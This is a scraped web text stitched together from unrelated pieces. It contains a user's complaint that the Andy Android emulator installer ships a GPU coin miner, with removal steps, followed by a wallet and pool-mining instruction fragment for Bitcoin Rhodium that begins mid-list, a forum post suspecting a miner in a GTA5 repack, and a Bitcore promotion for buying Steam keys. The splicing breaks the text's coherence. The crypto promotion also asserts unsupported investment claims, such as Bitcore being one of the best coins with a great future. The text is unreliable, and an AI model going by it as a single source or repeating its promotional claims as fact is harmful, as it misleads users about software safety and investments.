I created a video showcasing the entire installation process, including GPU usage before and after Andy was installed. This was sent directly to the creators of Andy (which is who I'm referencing in the video), as they refused to believe that the bitcoin miner was anything to do with installing their software. Apparently giving them virustotal scans and screenshots are not enough evidence and some users in the Andy support Facebook group blindly tried accusing me and my friends of using a tampered installer. The video shows that I downloaded every single executable possible from their official website and I was served the same installer each time.

How to remove Andy

Removing Andy and the bitcoin miner is actually really easy. The miner doesn't even attempt to hide itself and doesn't have a specific payload so it's just always running.
  1. Close every Andy-related process via task manager.
  2. Uninstall Andy via Windows
  3. Look for a process named 'Updater' (This is the miner and surprisingly enough won't be uninstalled when you uninstall Andy! Would you believe it!)
  4. Right click that process and click 'Go to details'
  5. Right click 'Updater.exe' in details and click 'End process tree'
  6. Navigate to C:\Program Files (x86)
  7. Click once on the folder named 'Updater' and then press Shift+Delete
  8. Click once on the folder named 'AndyOS' and then press Shift+Delete
  9. Recheck task manager to confirm no more Andy services are running
  10. Download Malwarebytes and perform a full system scan to check if anything was missed
  11. Download CCleaner and do a registry fix. Multiple Andy registry entries will be found. Delete these and scan again to ensure that nothing was missed

Why didn't my antivirus detect it?

The likelihood is that your antivirus probably thought you wanted it. If every antivirus detects bitcoin miners as a threat then it's only going to get in the way of people who genuinely want to mine bitcoins on their system for personal use.

What now?

The Andy development team claim they are 'looking into this', but it has been reported to them in the past and nothing has changed at all. It has been removed off of the list of best Android emulators by Android Authority after I contacted the writer of the article with this evidence. He also installed Andy and confirmed that something fishy is going on. Even after being provided with evidence, the infected installer is still served today from their website.

Andy devs giving conflicting stories

Someone working for Andy by the name of Ghazi has been urging people to stop spreading the claims that Andy installs a bitcoin miner by saying that Andy doesn't mine for bitcoins and that we've been using an older version, which uses a similar method as Andy requires something to do with blockchain technology. This makes no sense. I don't understand why a modified ROM and basic application that hooks into a virtual machine would require anything to do with blockchain technology. Another reason this makes no sense is that the OWNERS of Andy said that it shouldn't be there, and that it's not their fault because they use a third party installer provided by another company. Two very conflicting stories.

TL;DR

In summary, when you install Andy from their official website, you 100% receive a bitcoin miner.
I will update this post with any further advancements.
Edit: The thing Ghazi was talking about is a deprecated ‘Andy Cloud Experiment’ which is no longer in use. They are still looking into the current issue but are still serving the infected file.
Edit: After being banned from their support group I got in on another account. I made a post and when I told them who I was they instantly banned me again. Fantastic! Great guys! Professionals!
Edit: Joined on a third account and was banned again! What a surprise!

  2. Sign in and click “Create Wallet”.
  3. Set up a strong transaction password. Make sure you store it securely in a secure password manager of choice.
  4. Copy the seed somewhere safe. It’d be a good idea to write seed on a hardcopy and keep it safe.
  5. Paste it to confirm you got it right.
  6. Grab an address for the mining step. Your wallet is now ready to mine XRC.

Instructions for mining XRC on the official pool

Pool link: poolcore.bitcoinrh.org
  1. Any miner that supports X13 will be able to mine XRC. We have a few examples below of miners that are well tested with Bitcoin Rhodium network.
  2. For any miner, configure the miner to point to:
(0–0.8 GH/s) stratum+tcp://poolcore.bitcoinrh.org:3061
(0.8–2 GH/s) stratum+tcp://poolcore.bitcoinrh.org:3062

I think I found a coin miner malware related to Brick repack.

GTA5 and other games became unplayable due to slideshow levels of low FPS so I checked the task manager and spotted something suspicious(look where it's running from). I also checked GPU usage and while this thing was running, GPU usage was ~97%. Killing this thing solved the issues.
Due to high GPU usage I believe it's a cryptocurreny miner malware.
This is new and I didn't install anything besides Brick repack of GTA5 for quite some time but still, if others confirm we may reach a solid conclusion.

Steam is a digital distribution platform developed by Valve Corporation offering digital rights management1 (DRM), multiplayer gaming and social networking services. Steam provides the user with installation and automatic updating of games on multiple computers, and community features such as friend lists and groups, cloud saving, and in-game voice and chat functionality.
If you purchase a game that uses Steam from another website as a digital download, you'll be given a product key that you use to activate the game on Steam. A Steam key is a unique code that you will use to access the full game2.
Bitcore BTX originally a hybrid fork of Bitcoin, features a proof-of work consensus mechanism and implements all of the BIPs (Bitcoin Improvement Proposals) of the Bitcoin protocol3.

More exchanges are listing Bitcore (BTX) and businesses are adopting it. One of the latest cases of adoption of BTX is in purchasing Steam Games Key from Games4Coins.
Games4Coins is a platform that you can purchase Steam product keys. Buying a game on Games4Coins is really simple. Once you have selected a game, you can quickly and securely pay. Why we say quickly and securely? Because a powerful cryptocurrency, Bitcore (BTX) is accepted as a payment coin at this platform (Figure 1). Moreover, as a crypto, they accept only Bitcore.

After the transaction is complete, you gain full access to your purchased game key which is 15 letter+number code that would look something like this: 8GMR2-Q20YJ-9PDKL. Once you get that, you go into your steam app on your computer and go to Games > Activate a product on steam. Then it will have a space for you to put your code.
Bitcore is one Cryptocurrency with a big Future”. Games4Coins Team
There are totally forty seven steam games and you can pay via Bitcore for all games. Moreover the prices are very cheap, between 0.44303596 BTX and 5.41588852 BTX (Figure 2).

Consequently, Bitcore is one of the best cryptos in the market. It is also one of the fastest cryptos in the market when compared to Bitcoin, Litecoin and many other top 10 cryptos. Given that transaction speeds are a factor in the applicability of crypto in real-world business usage, it then follows that Bitcore’s long-term prospects are quite good, as blockchain technology continues to gain a foothold in business. This kind of integrations could open the doors for other major businesses to adopt BTX as a payment method, further adding to the intrinsic value of this crypto. The future of Bitcore (BTX) looks great.
